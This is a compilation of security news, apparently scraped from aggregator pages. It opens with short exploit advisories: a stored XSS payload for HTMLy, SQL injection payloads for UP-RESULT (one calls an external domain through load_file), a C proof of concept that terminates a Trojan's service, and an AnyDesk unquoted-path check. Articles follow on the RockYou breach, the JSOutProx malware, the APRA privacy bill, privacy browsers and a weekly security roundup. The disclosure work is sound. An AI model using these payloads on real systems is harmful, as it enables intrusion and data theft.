HTMLy version 2.9.6 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: HTMLy Version : 2.9.6  - Stored XSS# Exploit Author: tmrswrr # Vendor Homepage: https://www.htmly.com/# Version 3.10.8.21 # Date : 04/08/20241 ) Login admin https://127.0.0.1/HTMLy/admin/config2 ) General Setting > Blog title >  "><img src=x onerrora=confirm() onerror=confirm(1)> 3 ) After save it you will be see xss alert

HTMLy 2.9.6 Cross Site Scripting

UP-RESULT version 0.1 2024 suffers from a remote SQL injection vulnerability.

    ## Title: upresult_0.1-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 04/08/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download## Reference: https://portswigger.net/web-security/sql-injection## Description:The nid parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+'was submitted in the nid parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system by using thisvulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: nid (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM(SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: nid=145448807' or '1766'='1766' UNION ALL SELECTNULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/upresult_0.1-2024)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/upresult01-2024-multiple-sqli.html)## Time spent:00:15:00

UP-RESULT 0.1 2024 SQL Injection

Trojan.Win32.Razy.abc malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/0eb4a9089d3f7cf431d6547db3b9484d.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan.Win32.Razy.abcVulnerability: Insecure Permissions (In memory IPC)Family: RazyType: PE32MD5: 0eb4a9089d3f7cf431d6547db3b9484dSHA256: 3d82fee314e7febb8307ccf8a7396b6dd53c7d979a74aa56f3c4a6d0702fd098 Vuln ID: MVID-2024-0678Dropped files: performer.exeDisclosure: 04/07/2024Description:  The trojan installs a service under "C:\Program Files (x86)\SmartData" and runs with SYSTEM integrity. Terminating the malware service would typically require high integrity user privileges. However, standard low integrity users can successfully terminate it by exploiting insecure Win32 in memory event objects "esnm" or "epp". Since no permissions are set on these IPC objects a low integrity user can set the DACL to deny access for the everyone user group, then set and reset the event to cause the malware to terminate. Interestingly, I used same technique to defeat RSA's EDR agent "netwitness" CVE-2022-47529.PE file "performer.exe" is ran using rundll32 RunHTMLApplication.Win32 API Event objects.performer.exe creates Event  \BaseNamedObjects\epp  ===> with no permissions setsvchost_ms.exe creates Event \BaseNamedObjects\esnm   ===> with no permissions setExploit/PoC:"Trojan_Razy_Exploit.c"#include "windows.h"#include "stdio.h"#include "accctrl.h"#include "aclapi.h"#define OPEN_ALL_ACCESS 0x1F0003/*John Page (aka hyp3rlinx) - circa April of 2024 Malvuln projectIncorrect in-memory Win32 API access control allows termination of the malware service by a standard user.Trojan.Win32.Razy.abcMD5: 0eb4a9089d3f7cf431d6547db3b9484d*/char Vuln_Events[][32] = {"Global\\esnm", "Global\\epp"};BOOL PWNED=FALSE;int main(void){    PACL pOldDACL = NULL;  PACL pNewDACL = NULL;  int i=0;    for(; i < sizeof(Vuln_Events) /  sizeof(Vuln_Events[0]); i++){    HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]);    if (hEvent != INVALID_HANDLE_VALUE){   if(!PWNED){       printf("[+] Exploiting Trojan Razy Event: %s\n", Vuln_Events[i]);   }    if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){    TRUSTEE trustee[1];    trustee[0].TrusteeForm = TRUSTEE_IS_NAME;    trustee[0].TrusteeType = TRUSTEE_IS_GROUP;    trustee[0].ptstrName = TEXT("Everyone");     trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;    trustee[0].pMultipleTrustee = NULL;    EXPLICIT_ACCESS explicit_access_list[1];    ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));    explicit_access_list[0].grfAccessMode = DENY_ACCESS;     explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;    explicit_access_list[0].grfInheritance = NO_INHERITANCE;    explicit_access_list[0].Trustee = trustee[0];        if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){       printf("%d", GetLastError());    }          if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){                   printf("%d", GetLastError());        }else{        PWNED=TRUE;        SetEvent(hEvent);        Sleep(1000);        ResetEvent(hEvent);        CloseHandle(hEvent);        Sleep(1000);      }    LocalFree(pNewDACL);    LocalFree(pOldDACL);    CloseHandle(hEvent);    Sleep(1000);   } }  }if(PWNED){  printf("[+] Trojan.Win32.Razy.abc / MD5: 0eb4a9089d3f7cf431d6547db3b9484d PWNED!\n");  PWNED=FALSE;}printf("[+] By malvuln... Done!\n");system("pause");return 666;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan.Win32.Razy.abc MVID-2024-0678 Insecure Permissions

AnyDesk version 7.0.15 suffers from an unquoted service path vulnerability.

    # Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path PrivilegeEscalation# Date: 2024-04-01# Exploit Author: Milad Karimi (Ex3ptionaL)# Contact: miladgrayhat@gmail.com# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL# Vendor Homepage: http://anydesk.com# Software Link: http://anydesk.com/download# Version: Software Version 7.0.15# Tested on: Windows 10 Pro x641. Description:The Anydesk installs as a service with an unquoted service path runningwith SYSTEM privileges.This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.2. ProofC:\>sc qc anydesk[SC] QueryServiceConfig SUCCESSSERVICE_NAME: anydesk        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"--service        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : AnyDesk Service        DEPENDENCIES       : RpcSs        SERVICE_START_NAME : LocalSystemC:\>systeminfoOS Name:  Microsoft Windows 10 ProOS Version: 10.0.19045 N/A Build 19045OS Manufacturer: Microsoft Corporation

AnyDesk 7.0.15 Unquoted Service Path

By Daily Contributors
Today over at Resonance Security I am going to look at one of the more unusual ways in…
This is a post from HackRead.com Read the original post: The Legacy of a Security Breach

This article was authored and contributed by Keir Finlow-Bates, a passionate blockchain enthusiast and technologist.

Today over at Resonance Security I am going to look at one of the more unusual ways in which your approach to computer security can lead to an increase in public awareness of your company.

There are many motivations for starting a company: becoming wealthy, doing something interesting and useful, and leaving some kind of legacy or mark on history are three of the main ones that spring to mind.

About that legacy: imagine having the name of your corporation attached to a file representing one of the most significant hacks of the 21st century!

That’s quite notable, but probably not what the founders of one particular company were looking for with their startup.

****We won’t rock you****

In the middle of the 2000s, RockYou, Inc. was doing well as a widget-maker for social media companies like MySpace and Facebook. However, back in 2009, it suffered a data breach in which a hacker discovered an SQL database server with an unpatched ten-year-old bug, the database containing over 32 million usernames and passwords for user accounts.

That’s right — 32 million usernames, and their associated passwords. For comparison, that’s about 10% of the active monthly users that Facebook had at the time.

The passwords were stored in plain text.

****Mud on your face, big disgrace****

Not only did RockYou initially fail to notify their users, but it subsequently released a falsified official statement claiming that the breach was less severe than it was.

To be clear: it was a very, very serious breach.

A decade and a half ago, people were far worse at password security than they are now. Password managers were almost unheard of, for some unexplained bizarre reason some sites blocked the use of password managers for unspecified “security reasons”, and two-factor authentication was pretty much only affordable and available to business users.

Because people were told not to write down their passwords, this meant that most of the leaked credentials were being used on other websites. After all, who in their right mind is going to memorize twenty or thirty different random passwords? As a result, sites such as banks, online stores, health databases, social media, supposedly private online journals, and online games held accounts using the same passwords.

****The legacy****

For years the full list of RockYou passwords has been available to download by anyone. It is typically found in a file called rockyou.txt , and there are plenty of GitHub repositories out there where you can find it.

In Kali Linux, a Linux distribution designed and produced specifically for penetration testing, the RockYou text file is included during the installation by default.

****Conclusion****

Just imagine — with a little bit of security carelessness, you too can take your modestly successful company and in the process of destroying it, allow its name to live on forever.

Have we learned anything since 2009? Not always.

For example: in 2017 it was revealed that an old social media site called LiveJournal, dating back to the 90s (but still running to this day), suffered a breach in which 26 million unique usernames, email addresses, and plaintext passwords were extracted. It took them until 2019 to admit to the breach.

That’s right — passwords were still being stored in plaintext in 2017, and I would bet good money on there being more sites out are doing the same, even though we are a decade and a half on from the original RockYou breach.

I predict that the leakage of passwords will only end once we stop using passwords, and start using improved systems such as security keys and self-managed identity for our authentication systems.

In the meantime, you have to assume that any password you provide to a website will eventually be leaked, therefore:

*   use a password manager to generate long, random, unique passwords for your accounts,
*   protect access to the password manager with two-factor authentication, and
*   make sure the password you use for your password manager has never been used anywhere else.

****Post-script****

Don’t run off and look for a website that allows you to enter your password and see if it was ever revealed in a breach! I can guarantee it will be a phishing site. Instead, I recommend HaveIBeenPwned, where you can type in your email address, and retrieve a list of the companies and websites that have managed to leak your credentials to the dark web through bad security practices. Another option is the Resonance Data Leak Detector, which monitors if your credentials have been leaked 24/7 and automatically notifies you.

****About Resonance Security****

Resonance Security is a curated platform for end-to-end cybersecurity products and services. It functions as a concierge for your organization’s end-to-end cyber-security needs, aggregating valuable security offerings into one platform to spread awareness on what it takes to secure your technology stack end-to-end.

I’m Keir Finlow-Bates, often known as Blockchain Gandalf, and am primarily a blockchain researcher and inventor. I started on this journey in late 2010 by examining the original Bitcoin code, and have been obsessed with blockchain ever since.

I am also the author of two books on the topic: Move Over Brokers Here Comes The Blockchain, explaining blockchain, and Evil Tokenomics, illustrating through practical examples how web3 scams work. You can find more at my website: Thinklair.com

1.  The Forgotten Victims of Data Breach
2.  Solving the Cyber Security Problem: Mission Impossible
3.  Will good prevail over bad as bots battle for the internet?
4.  If a Cyber Security Report Falls in a Forest, Is Anyone Listening?

The Legacy of a Security Breach

An ongoing cyberattack campaign with apparent ties to China uses a new version of sophisticated JavaScript remote access Trojan JSOutProx and is now targeting banks in the Middle East.

Source: Irina Shi via Shutterstock

The sophisticated threat group behind a complex JavaScript remote access Trojan (RAT) known as JSOutProx has released a new version of the malware to target organizations in the Middle East.

Cybersecurity services firm Resecurity analyzed technical details of multiple incidents involving the JSOutProx malware targeting financial customers and delivering either a fake SWIFT payment notification if targeting an enterprise, or a MoneyGram template when targeting private citizens, the company wrote in a report published this week. The threat group has targeted government organizations in India and Taiwan, as well as financial organizations in the Philippines, Laos, Singapore, Malaysia, India — and now Saudi Arabia.

The newest version of JSOutProx is a very flexible and well-organized program from a development perspective, allowing the attackers to tailor is functionality for the victim's specific environment, says Gene Yoo, CEO of Resecurity.

"It's a malware implant with multiple stages, and it has multiple plug-ins," he says. "Depending on the victim's environment, it goes right in and then actually bleeds them or poisons the environment, depending on what plug-ins are enabled."

The attacks are the latest campaign by a cybercriminal group known as Solar Spider, which appears to be the only group using the JSOutProx malware. Based on the group's targets — typically organizations in India, but also in the Asia-Pacific, Africa, and Middle East regions — it's likely linked to China, Resecurity stated in its analysis.

"By profiling the targets, and some of the details that we obtained in the infrastructure, we suspect that it's related to China," Yoo says.

**"Highly Obfuscated ... Modular Plug-in"**

JSOutProx is well known in the financial industry. Visa, for example, documented campaigns using the attack tool in 2023, including one pointed at several banks in the Asia-Pacific region, the company stated in its Biannual Threats Report published in December.

The remote access Trojan (RAT) is a "highly obfuscated JavaScript backdoor, which has modular plugin capabilities, can run shell commands, download, upload, and execute files, manipulate the file system, establish persistence, take screenshots, and manipulate keyboard and mouse events," Visa stated in its report. "These unique features allow the malware to evade detection by security systems and obtain a variety of sensitive payment and financial information from targeted financial institutions.

JSOutProx typically appears as a PDF file of a financial document in a zip archive. But really, it's JavaScript that executes when a victim opens the file. The first stage of the attack collects information on the system and communicates with command-and-control servers obfuscated via dynamic DNS. The second stage of the attack downloads any of some 14 plug-ins to conduct further attacks, including gaining access to Outlook and the user's contact list, and enabling or disabling proxies on the system.

The RAT downloads plugins from GitHub — or more recently, GitLab — to appear legitimate.

"The discovery of the new version of JSOutProx, coupled with the exploitation of platforms like GitHub and GitLab, emphasizes these malicious actors’ relentless efforts and sophisticated consistency," Resecurity said in its analysis.

**Monetizing Data From Middle East Financials**

Once Solar Spider compromises a user, the attackers collect information, such as primary account numbers and user credentials, and then conduct a variety of malicious actions against the victim, according to Visa's threat report.

"The JSOutProx malware poses a serious threat to financial institutions around the world, and especially those in the AP region as those entities have been more frequently targeted with this malware," the Visa report stated.

Companies should educate employees about how to handle unsolicited, suspicious correspondence to mitigate the threat of the malware, Visa stated. In addition, any instance of the malware must be investigated and completely remediated to prevent reinfection.

Bigger companies and government agencies are more likely to be attacked by the group because Solar Spider has its sights on the most successful firms, Resecurity's Yoo says. For the most part, however, companies don't have to take threat-specific steps but instead focus on defense-in-depth strategies, he says.

"The user should focus on not looking at the shiny object in the sky, like the Chinese are attacking, but on what they need to do is create a better foundation," Yoo says. "Having good patching, network segmentation, and vulnerability management. If you do that, then none of this would" likely impact your users.

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Solar Spider Spins Up New Malware to Entrap Saudi Arabian Financial Firms

While some states have made data privacy gains, the US has so far been unable to implement protections at a federal level. A new bipartisan proposal called APRA could break the impasse.

Congress may be closer than ever to passing a comprehensive data privacy framework after key House and Senate committee leaders released a new proposal on Sunday.

The bipartisan proposal, titled the American Privacy Rights Act, or APRA, would limit the types of consumer data companies can collect, retain, and use to what they need to operate their services. Users would also be allowed to opt-out of targeted advertising and have the ability to view, correct, delete, and download their data from online services. The proposal would also create a national registry of data brokers, and force those companies to allow users to opt out of having their data sold.

“This landmark legislation gives Americans the right to control where their information goes and who can sell it,” Cathy McMorris Rodgers, House Energy and Commerce Committee chair, said in a statement on Sunday. “It reins in Big Tech by prohibiting them from tracking, predicting, and manipulating people’s behaviors for profit without their knowledge and consent. Americans overwhelmingly want these rights, and they are looking to us, their elected representatives, to act.”

Congress has tried to put together a comprehensive federal law protecting user data for decades. Lawmakers have remained divided, though, on whether that legislation should prevent states from issuing tougher rules, and whether to allow a “private right of action” that would enable people to sue companies in response to privacy violations.

In an interview with the _Spokesman Review_ on Sunday, McMorris Rodgers claimed that the draft’s language is stronger than any active laws, seemingly as an attempt to assuage the concerns of Democrats who have long fought attempts to preempt preexisting state-level protections. APRA does allow states to pass their own privacy laws related to civil rights and consumer protections, among other exceptions.

In the previous session of Congress, the leaders of the House Energy and Commerce Committees brokered a deal with Roger Wicker, the top Republican on the Senate Commerce Committee, on a bill that would preempt state laws with the exception of the California Consumer Privacy Act and the Biometric Information Privacy Act of Illinois. That measure, titled the American Data Privacy and Protection Act, also created a weaker private right of action than most Democrats were willing to support. Cantwell refused to support the measure, instead circulating her own draft legislation. The ADPPA hasn’t been reintroduced, but APRA was designed as a compromise.

“I think we have threaded a very important needle here,” Cantwell told the _Spokesman Review_. “We are preserving those standards that California and Illinois and Washington have.”

APRA includes language from California’s landmark privacy law allowing people to sue companies when they are harmed by a data breach. It also provides the Federal Trade Commission, state attorneys general, and private citizens the authority to sue companies when they violate the law.

The categories of data that would be impacted by the APRA include certain categories of “information that identifies or is linked or reasonably linkable to an individual or device,” according to a Senate Commerce Committee summary of the legislation. Small businesses—those with $40 million or less in annual revenue and limited data collection—would be exempt under APRA, with enforcement focused on businesses with $250 million or more in yearly revenue. Governments and “entities working on behalf of governments” are excluded under the bill, as are the National Center for Missing and Exploited Children and, apart from certain cybersecurity provisions, “fraud-fighting” nonprofits.

US representative Frank Pallone, the top Democrat on the House Energy and Commerce Committee, called the draft “very strong” in a Sunday statement, but said he wanted to “strengthen” it with tighter child safety provisions.

Still, it remains unclear whether APRA will receive the necessary support for approval. On Sunday, committee aids said that conversations on other lawmakers signing onto the legislation are ongoing. The current proposal is a “discussion draft;” while there’s no official date for introducing a bill, Cantwell and McMorris Rodgers will likely shop around the text to colleagues for feedback over the coming weeks, and plan to send it to committees this month.

A Breakthrough Online Privacy Proposal Hits Congress

Ad trackers are out of control. Use a browser that reins them in.

Google's admission that, yes, it does track you while you're in Chrome's Incognito mode, is just the latest in a long line of unsettling revelations about just how keenly Big Tech keeps an eye on our movements every time we connect to the internet. Billions of data records will now be deleted as part of a settlement to a class action lawsuit brought against Google.

As we've written before, Incognito mode and the equivalent modes offered by other browsers aren't as secure as you might think, particularly if you start signing into accounts like Google or Facebook. Your activities and searches as a logged-in user on large platforms can still be recorded, primarily to create advertising that's more accurately targeted toward your demographic.

Google, for its part, says it’s transparent about what data it’s storing and why—and in recent years it has made it easier for users to see and delete the information held about them. To really lock down your privacy and security, though, it’s best to switch to a browser not made by a company that earns billions of dollars selling ads.

And there are alternatives: Below we recommend several browsers built with user privacy and security as a priority. Even better, in many cases they can import data such as bookmarks and passwords from your current browser—Google Chrome, for example.

**DuckDuckGo (Android, iOS, Windows, macOS)**

The DuckDuckGo browser blocks trackers at their source.

DuckDuckGo via David Nield

You might know DuckDuckGo as the anti-Google search engine, but the parent company has branched out to make its own browsers too. They keep you well protected online and at the same time give you plenty of information about the tracking technologies being proactively blocked.

DuckDuckGo starts by enforcing encrypted HTTPS connections when websites offer them, and gives each page you visit a grade based on how aggressively it's trying to mine your data. It'll even scan and rank site privacy policies for you.

When it comes to browsing data, this can be cleared automatically at the end of each session or after a certain period of time. Pop-ups and ads are snuffed out, and of course the DuckDuckGo search engine is built in, free of the Google trappings.

You also get extras like throwaway email aliases you can use in place of your real email address to protect your privacy, and everything about the browser and its features is simple to use: You don't really need to do anything except install them, so you're getting maximum protection with minimal effort.

**Ghostery (Android, iOS, Windows, macOS)**

Ghostery comes with a range of tools to protect your privacy.

Ghostery via David Nield

Install Ghostery on your mobile device or your computer, and straight away it gets to work blocking adverts and tracking cookies that will attempt to keep tabs on what you're up to on the web. There are no complicated setup screens or configurations to manage.

Like DuckDuckGo, Ghostery tells you exactly which trackers and ads it's blocking and how many monitoring tools each website has installed. If you do come across certain sites that are well behaved, you can mark them as trusted with a tap.

Or, if you find a site that's packed full of tracking systems, you can block every single bit of cookie technology on it (for commenting systems, media players, and so on), even if the site ends up breaking. A simple, private search engine is built in to replace Google too.

Ghostery's tools are a little more in-depth and advanced than the ones offered by DuckDuckGo, so you might consider it if you want to take extra control over which trackers are blocked on which sites—but it's simple enough for anyone to use.

**Tor Browser (Android, Windows, macOS)**

Tor connects you to the Tor network, to keep your online activities more private.

Tor via David Nield

Tor Browser markets itself as a browsing option "without tracking, surveillance, or censorship." It is worth a look if you want the ultimate in anonymized, tracker-free browsing—unless you're on iOS, where it isn't available (Tor recommends the Onion Browser instead).

The browser is part of a bigger project to keep internet browsing anonymous: Use Tor and you use the Tor Project network, a complex, encrypted relay system managed by the Tor community, making it much harder for anyone else to follow your activities online.

As well as this additional layer of anonymity, Tor Browser is super-strict on the background scripts and tracking tech that sites can run. It also blocks fingerprinting, a method where advertisers attempt to recognize the unique characteristics of your device.

At the end of each browsing session, everything gets wiped, including cookies left behind by sites and the browsing history inside the Tor Browser app itself. In other words, private browsing that leaves no trace is the default—and indeed the only option.

**Brave (Android, iOS, Windows, macOS)**

Brave gives you a clean, speedy browsing experience.

Brave via David Nield

Brave comes with all the tracking protection features you would expect: Ads are completely blocked, there are tight restrictions on the data that sites can gather through cookies and tracking scripts, and you're always kept informed about what's happening.

The browser comes with an optional built-in VPN, though it costs extra ($10 a month). You can also, if you want, use Brave to access the Tor network we mentioned with the Tor browser and take advantage of its anonymizing relay service that hides your location and browsing data.

There's no doubt about the effectiveness of Brave's tracker-blocking technologies, and getting around the web in Brave is quick and snappy. It's a comprehensive package and one that strikes a well-judged balance between simplicity and power for the majority of users.

Brave has regularly pioneered features related to innovative web technologies, including cryptocurrencies, NFTs, and (most recently) artificial intelligence; there's actually a new AI assistant built into it. In other words, it's not exclusively focused on security and privacy.

**Firefox (Android, iOS, Windows, macOS)**

Firefox is part of a suite of privacy products from Mozilla.

Firefox via David Nield

Firefox has long been at the forefront of online privacy—blocking tracking cookies across sites by default, for example—and it continues to be one of the best options for making sure you're giving away as little data as possible as you make your way across the web.

Firefox also gives you a ton of information on each website you visit regarding the trackers and cookies that pages have attempted to leave, and which ones Firefox has blocked. Permissions for access to your location and microphone can be easily managed as well.

Aside from looking after the interests of its users, Firefox also scores highly for user customization. You can change the look and behavior of the browser in a variety of ways, and there are useful integrations like the built-in Pocket utility that saves web stories on your device so you can read them later.

Firefox developer Mozilla offers plenty of extras, including a free data-breach monitor that tells you when your usernames and passwords may have been exposed somewhere online, a free email alias system to keep your actual email address protected, and a VPN that costs $10 per month. It all adds up to a comprehensive package for keeping you safe online.

**Safari (iOS, macOS)**

Safari has been blocking tracking cookies for some time.

Safari via David Nield

Apple continues to add privacy tech to Safari with each release on iOS and macOS—like requiring user authentication (such as a Face ID scan) when returning to a browsing session—though it's obviously not a browsing option if you're on Android or Windows.

Safari has long been blocking third-party tracking cookies that try to connect the dots on your web activity across multiple sites. It also blocks device fingerprinting techniques that try to identify your devices, and it reports back on the trackers it has disabled.

The browser can now also warn you when you try to use a password that's too weak on a new website or service, and it will make a suggestion of a stronger password if needed. Recent browser updates added support for logging in with passkeys too.

Safari operates against the backdrop of Apple's commitment to collect as little information about you as possible and to keep most of that information locked away locally on your device rather than on Apple's servers.

_Update: April 6, 2024, 8:30 am: This guide was updated to include new guidance for DuckDuckGo and Ghostery, as well as to bring some descriptions of browser providers' data collection policies up to date._

Best Privacy Browsers (2024): Brave, Safari, Ghostery, Firefox, DuckDuckGo

Plus: Microsoft scolded for a “cascade” of security failures, AI-generated lawyers send fake legal threats, a data broker quietly lobbies against US privacy legislation, and more.

It’s been a week since the world avoided a potentially catastrophic cyberattack. On March 29, Microsoft developer Andres Freund disclosed his discovery of a backdoor in XZ Utils, a compression tool widely used in Linux distributions and thus countless computer systems worldwide. The backdoor was inserted into the open source tool by someone operating under the persona “Jia Tan” after years of patient work building a reputation as a trustworthy volunteer developer. Security experts believe Jia Tan is the work of a nation-state actor, with clues largely pointing to Russia, although definitive attribution for the attack is still outstanding.

In early 2022, a hacker operating under the name “P4x” took down the internet of North Korea, after the country’s hackers had targeted him. This week, WIRED revealed P4x’s true identity as Alejandro Caceres, a 38-year-old Colombian American. Following his successful attack on North Korea, Caceres pitched the US military on a “special forces”-style offensive hacking team that would carry out operations similar to the one that made P4x famous. The Pentagon eventually declined, but Caceres has launched a startup, Hyperion Gray, and plans to further pursue his controversial approach to cyberwarfare.

In mid-February, millions of people lost internet access after three undersea cables in the Arabian Sea were damaged. Some blamed Houthi rebels in Yemen, who had been attacking ships in the region, but the group denied it had sabotaged the cables. But the rebel attacks are still likely to blame—albeit, in a bizarre way. A WIRED analysis of satellite images, maritime data, and more found that the cables were likely damaged by the trailing anchor of a cargo ship that the Houthi rebels had bombed. The ship drifted for two weeks before finally sinking, crossing paths with the cables at the time they were damaged.

The myth that Google Chrome’s Incognito mode provides adequate privacy protections can finally be put to rest. As part of a settlement over Google’s Incognito privacy claims and practices, the company has agreed to delete “billions” of records collected while users browsed in Incognito mode. It will also further clarify how much user data can be collected by Google and third parties while Incognito is enabled, and take further steps to protect user privacy. There are other privacy-focused browsers that can replace Chrome. But if you’re still using it, make sure to update it to patch some serious security flaws.

But that’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

A 58-year-old hospital systems administrator pleaded guilty this week to US federal charges after he was caught using another man’s name for more than 30 years. Matthew David Keirans allegedly stole the identity of William Woods in 1988, when the two men worked at a hot dog cart in Albuquerque, New Mexico, according to the US Attorney's Office for the Northern District of Iowa. Over the decades, Keirans obtained employment, bank accounts, loans, and insurance, and paid taxes, under the Woods name. Keirans even had a child whose last name is Woods.

The real William Woods, meanwhile, reportedly learned that someone else was using his identity in 2019. At the time, Woods was unhoused and living in Los Angeles. He contacted a bank where “William Woods” had an account, providing his real Social Security card and California ID card to prove his identity. However, he could not answer the security questions to gain access. The bank called Keirans—who was pretending to be Woods—and Keirans convinced the bank employee that the real Woods should not have access to the accounts. The Los Angeles Police Department then arrested the real Woods and charged him with identity theft after Keirans provided officers with false documents and information.

In a nightmarish twist, during judicial proceedings, the real Woods accurately maintained that “William Donald Woods” was his true identity, prompting the court to order him to a mental institution. The real Woods ultimately spent 428 days in jail and 147 days in a mental hospital before his release.

The real Woods then continued to work to regain his true identity, eventually contacting authorities after learning that Keirans worked at a hospital in Iowa City. Investigators later confirmed the real Woods’ identity after obtaining a DNA test. Confronted with the evidence, Keirans confessed to a series of crimes and now faces a maximum sentence of 32 years in prison, a $1.25 million fine, and five years of supervised release.

**US Review Board Slams Microsoft for ‘Cascade of Avoidable Security Failures’**

The White-House mandated Cyber Safety Review Board issued a scathing report against Microsoft this week, accusing the tech giant of failing to stop a “preventable” intrusion by China-backed hackers of hundreds of Microsoft Exchange Online email accounts. To gain access to email accounts belonging to 22 organizations and 500 individuals worldwide, the hackers, known as Storm-0558, stole a Microsoft cryptographic key. The CSRB report chastises the company for failing to detect “the compromise of its cryptographic crown jewels,” inadequate security practices, and a “corporate culture that deprioritized both enterprise security investments and rigorous risk management,” among a “cascade” of other defeats.

The report also found that Microsoft still does not know how Storm-0558 obtained its key, accusing the company of making false statements after it initially claimed that the key was accidentally included in an April 2021 “crash dump.” The company has since updated its explanation of the intrusion to say that it still does not know how the hackers obtained the key. The CSRB issued 25 recommended steps that Microsoft—a major government contractor whose systems protect highly sensitive information—should take to better protect its systems.

**AI-Generated Lawyers Caught Spewing Fake Legal Threats**

The owner of the website Tedium received legal threats from a nonexistent “law firm” charging the publication with a copyright violation. The thing is, the “lawyers” behind the complaint were AI-generated. The “law firm” accused Tedium of using a photograph without the owner’s consent, and a "copyright infringement" notice offered to supposedly settle the matter, if only Tedium would agree to properly credit the photo’s “owner” and link out to their website. This was, of course, a backlink scam designed to boost the SEO ranking of the fake copyright holder’s page. Only this time, the scam was bolstered by a cast of AI-generated characters: a hot-shot team of young, "skilled lawyers" purportedly specializing in creative rights and commercial law.

**Data Behemoth Enlists Lobbyists Against Effort in US to Limit Deals With Spies**

An internal feud is underway in the US Congress over the fate of a beleaguered spy program called Section 702 and the commercial deals that US intelligence agencies have struck in recent years with global data brokers, purchasing information that government agents typically need a warrant to obtain. Consequently, the UK owner of LexisNexis—an “amalgam of publishers and data brokers, stitched together into a single information giant”—has retained the services of a Washington, DC, lobbying firm to engage with federal lawmakers over “potential privacy, data security, breach notification, data broker, and FISA reform legislation.” Politico reports that the company, RELX, previously used the firm, Venable, to combat privacy legislation aimed at restricting the kinds of personal data companies are allowed to sell to law enforcement.

**‘Weapon Scanners’ Eyed by New York’s Surveillant Mayor Boasts Abysmal Track Record**

New York City mayor Eric Adams is hastening his crusade against subway violence with a plan to test weapons scanners that claim to use artificial intelligence to detect whether commuters are carrying blades and firearms. Documents obtained by Hell Gate reveal what Adams failed to disclose at a press conference last week: that data already in the city’s hands show the technology is only rarely useful. After police officers permitted to carry firearms were factored out of one study at a Bronx hospital, the scanners were found to be accurate less than 1 percent of the time. (All told, more than 85 percent of the time, the scanners cast false suspicion on New Yorkers who were found to be unarmed.) The move by Adams follows New York governor Kathy Hochul’s deployment of hundreds of National Guard soldiers in the city’s subway systems. Adams first addressed a spate of homicides and stabbings across the city in March by sending hundreds of police officers underground to search commuters' bags at well over 100 subway stations—a tactic that roused resistance from a few locals this week who smashed ticket machines and disabled security cameras at a midtown station to protest the surveillance surge.

Identity Thief Lived as a Different Man for 33 Years

One issue would have allowed cross-tenant attacks, and another enabled access to a shared registry for container images; exploitation via an insecure Pickle file showcases emerging risks for AI-as-a-service more broadly.

Source: Barry Mason via Alamy Stock Photo

